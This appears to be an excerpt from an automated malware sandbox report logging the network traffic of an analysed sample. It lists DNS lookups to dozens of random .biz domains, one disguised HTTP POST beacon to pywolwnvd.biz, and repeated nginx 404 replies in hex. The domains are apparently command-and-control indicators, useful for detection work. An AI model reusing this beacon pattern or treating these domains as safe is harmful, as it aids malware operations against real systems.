                    Source: global trafficDNS traffic detected: DNS query: jhvzpcfg.biz
                    Source: global trafficDNS traffic detected: DNS query: acwjcqqv.biz
                    Source: global trafficDNS traffic detected: DNS query: lejtdj.biz
                    Source: global trafficDNS traffic detected: DNS query: vyome.biz
                    Source: global trafficDNS traffic detected: DNS query: yauexmxk.biz
                    Source: global trafficDNS traffic detected: DNS query: iuzpxe.biz
                    Source: global trafficDNS traffic detected: DNS query: sxmiywsfv.biz
                    Source: global trafficDNS traffic detected: DNS query: vrrazpdh.biz
                    Source: global trafficDNS traffic detected: DNS query: ftxlah.biz
                    Source: global trafficDNS traffic detected: DNS query: typgfhb.biz
                    Source: global trafficDNS traffic detected: DNS query: esuzf.biz
                    Source: global trafficDNS traffic detected: DNS query: gvijgjwkh.biz
                    Source: global trafficDNS traffic detected: DNS query: qpnczch.biz
                    Source: global trafficDNS traffic detected: DNS query: brsua.biz
                    Source: global trafficDNS traffic detected: DNS query: dlynankz.biz
                    Source: global trafficDNS traffic detected: DNS query: oflybfv.biz
                    Source: global trafficDNS traffic detected: DNS query: yhqqc.biz
                    Source: global trafficDNS traffic detected: DNS query: mnjmhp.biz
                    Source: global trafficDNS traffic detected: DNS query: opowhhece.biz
                    Source: global trafficDNS traffic detected: DNS query: zjbpaao.biz
                    Source: global trafficDNS traffic detected: DNS query: jdhhbs.biz
                    Source: global trafficDNS traffic detected: DNS query: mgmsclkyu.biz
                    Source: global trafficDNS traffic detected: DNS query: warkcdu.biz
                    Source: global trafficDNS traffic detected: DNS query: gcedd.biz
                    Source: global trafficDNS traffic detected: DNS query: jwkoeoqns.biz
                    Source: global trafficDNS traffic detected: DNS query: xccjj.biz
                    Source: global trafficDNS traffic detected: DNS query: hehckyov.biz
                    Source: global trafficDNS traffic detected: DNS query: rynmcq.biz
                    Source: global trafficDNS traffic detected: DNS query: uaafd.biz
                    Source: unknownHTTP traffic detected: POST /omhtttbpfwdopn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 836
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 26 Nov 2024 07:14:43 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 26 Nov 2024 07:14:44 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 26 Nov 2024 07:14:55 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 26 Nov 2024 07:14:57 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 26 Nov 2024 07:15:01 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 26 Nov 2024 07:15:01 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 26 Nov 2024 07:15:12 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 26 Nov 2024 07:15:13 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Tue, 26 Nov 2024 07:15:43 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
